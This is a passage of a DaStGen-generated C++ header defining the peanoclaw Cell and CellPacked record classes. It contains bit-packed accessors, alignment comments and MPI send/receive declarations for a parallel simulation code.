* Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | evenFlags.to_ulong() << (3)); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; return (_persistentRecords._packedRecords0& mask); } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); assertion(!evenFlags || evenFlags==1); int shift = 3 + elementIndex; int mask = 1 << (shift); int shiftedValue = evenFlags << (shift); _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 & ~mask; _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 | shiftedValue; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; _persistentRecords._packedRecords0^= mask; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ Cell convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifdef PackedRecords #pragma pack (pop) #endif #elif defined(Parallel) && defined(SharedMemoryParallelisation) && defined(Debug) /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::Cell { public: typedef peanoclaw::records::CellPacked Packed; enum State { Leaf = 0, Refined = 1, Root = 2 }; struct PersistentRecords { int _cellDescriptionIndex; bool _isInside; State _state; int _level; #ifdef UseManualAlignment std::bitset<DIMENSIONS> _evenFlags __attribute__((aligned(VectorisationAlignment))); #else std::bitset<DIMENSIONS> _evenFlags; #endif #ifdef UseManualAlignment tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber __attribute__((aligned(VectorisationAlignment))); #else tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; #endif int _responsibleRank; bool _subtreeHoldsWorker; double _nodeWorkload; double _localWorkload; double _totalWorkload; double _maxWorkload; double _minWorkload; bool _cellIsAForkCandidate; int _numberOfLoadsFromInputStream; int _numberOfStoresToOutputStream; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _state = state; } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _evenFlags = (evenFlags); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellIsAForkCandidate; } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellIsAForkCandidate = cellIsAForkCandidate; } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfStoresToOutputStream = numberOfStoresToOutputStream; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ Cell(); /** * Generated */ Cell(const PersistentRecords& persistentRecords); /** * Generated */ Cell(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); /** * Generated */ virtual ~Cell(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._state = state; } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._evenFlags = (evenFlags); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); return _persistentRecords._evenFlags[elementIndex]; } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags[elementIndex]= evenFlags; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags.flip(elementIndex); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellIsAForkCandidate; } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellIsAForkCandidate = cellIsAForkCandidate; } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfStoresToOutputStream = numberOfStoresToOutputStream; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ CellPacked convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifndef DaStGenPackedPadding #define DaStGenPackedPadding 1 // 32 bit version // #define DaStGenPackedPadding 2 // 64 bit version #endif #ifdef PackedRecords #pragma pack (push, DaStGenPackedPadding) #endif /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::CellPacked { public: typedef peanoclaw::records::Cell::State State; struct PersistentRecords { int _cellDescriptionIndex; int _level; tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; int _responsibleRank; bool _subtreeHoldsWorker; double _nodeWorkload; double _localWorkload; double _totalWorkload; double _maxWorkload; double _minWorkload; int _numberOfLoadsFromInputStream; int _numberOfStoresToOutputStream; /** mapping of records: || Member || startbit || length | isInside | startbit 0 | #bits 1 | state | startbit 1 | #bits 2 | evenFlags | startbit 3 | #bits DIMENSIONS | cellIsAForkCandidate | startbit DIMENSIONS + 3 | #bits 1 */ short int _packedRecords0; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _packedRecords0 = static_cast<short int>( isInside ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | state << (1)); } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | evenFlags.to_ulong() << (3)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); _packedRecords0 = static_cast<short int>( cellIsAForkCandidate ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const 